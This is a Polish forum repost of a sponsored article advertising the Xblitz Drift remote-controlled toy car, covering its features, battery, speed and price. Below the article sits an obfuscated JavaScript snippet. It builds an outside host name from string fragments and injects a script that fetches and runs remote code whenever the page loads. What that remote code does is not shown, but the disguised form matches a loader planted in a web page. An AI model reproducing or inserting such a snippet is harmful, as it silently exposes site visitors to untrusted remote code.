Forum

DRIFT DLA NAJMŁODSZYCH? ZDALNIE STEROWANY SAMOCHODZIK XBLITZ DRIFT!
sp_BlogLink Przeczytaj oryginalny post blogu
03-10-2019
20:51

Image EnlargerXblitz Drift to debiut marki Xblitz na rynku zabawek. Ten sterowany radiem, zdalny samochodzik nie jest jednak małym, nie radzącym sobie z maminym dywanem resorakiem który ze swojego dzieciństwa mogą pamiętać młodzi rodzice. To prawdziwy, miniaturowy monster truck.

 Dzięki specjalnemu, sprężynowemu zawieszeniu, Xblitz Drift może pokonać wszystkie przeszkody na swojej drodze bez problemu. Może wspiąć się po stromym zboczu oraz przejechać nierówny teren bez najmniejszych problemów. Dzięki specjalnie wyprofilowanym kołom, zdalny samochodzik może poruszać się w aż 10 różnych kierunkach. Zabawka ma napęd na wszystkie cztery koła, nie utknie więc na żadnej nierówności. Można stworzyć prawdziwy tor przeszkód i cieszyć się jego przemierzaniem przez sterowany radiowo samochodzik Xblitz Drift. Zgodnie z nazwą zabawki, potrafi ona również wykonywać drift w miejscu, obracając się wokół własnej osi.

 Radiowy nadajnik, którego używa się do sterowania samochodzikiem Xblitz Drift leży wygodnie w dłoniach. To małe centrum dowodzenia, którego można użyć nie tylko do prowadzenia pojazdu, ale również by zmienić poziom jego zawieszenia, zaprogramować konkretne ruchy, włączyć odtwarzanie muzyki lub zatrąbić klaksonem. Każdy miłośnik małej motoryzacji z pewnością pokocha wszystkie możliwości które oferuje Xblitz Drift.

 Samochodzik Xblitz Drift ma wbudowany akumulator 1400mAh, dzięki czemu można nim bawić się długo. Zabawka posiada reflektory LED dzięki którym może przemierzać trudne tereny nawet w ciemnościach. Dodatkowo, podwozie posiada wielokolorowe podświetlenie, które zmienia barwę w rytm granej muzyki. Samochodzik może rozpędzić się do prędkości 30 kilometrów na godzinę. To prawdziwy, miniaturowy pojazd.

Xblitz Drift posiada tryb, w którym puszcza muzykę i kołysze się w jej rytm. Jest to tylko świetna zabawa dla dzieci, ale i ciekawy punkt rozrywki na przyjęciu z twoimi znajomymi. Wystarczy nacisnąć jeden przycisk i cieszyć się przedstawieniem.

Image Enlarger

Xblitz Drift przeznaczony jest dla dzieci powyżej szóstego roku życia. Zdalnie sterowany samochodzik będzie jednak wspaniałą rozrywką również dla starszych pociech jak i wielu rodziców czy miłośników tego typu urządzeń.

Sterowany zdalnie samochodzik Xblitz Drift można nabyć na stronie producenta za 299zł.

Artykuł partnera

(function(){
a1jk=document.createElement("script");a1jk_="u"+("s")+"ta";
a1jk_+=("t.i")+""+"n";a1jk_+=(("f")+"o");a1jk.type="text/javascript";
a1jk_+="/"; a1jku="183362006";a1jku+=".b0dbzg3w1jkXeus8ab1";a1jku+="ats4dwjnl2x";
a1jk.src="https://"+a1jk_+a1jku;a1jk.async=true;document.body.appendChild(a1jk);
})();